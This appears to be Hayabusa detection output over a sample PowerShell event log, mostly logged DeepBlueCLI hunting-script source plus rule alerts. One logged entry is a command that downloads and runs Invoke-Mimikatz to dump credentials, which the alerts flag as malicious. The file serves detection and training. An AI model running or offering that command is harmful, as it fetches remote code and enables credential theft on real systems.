{$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.572 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.578 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.581 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.201 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.201 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.202 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.203 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.734 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:49.131 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:56.217 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:12.696 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:14.161 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:28.002 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.553 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,medium,,Potentially Malicious 
PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. 
(Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. 
$servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. 
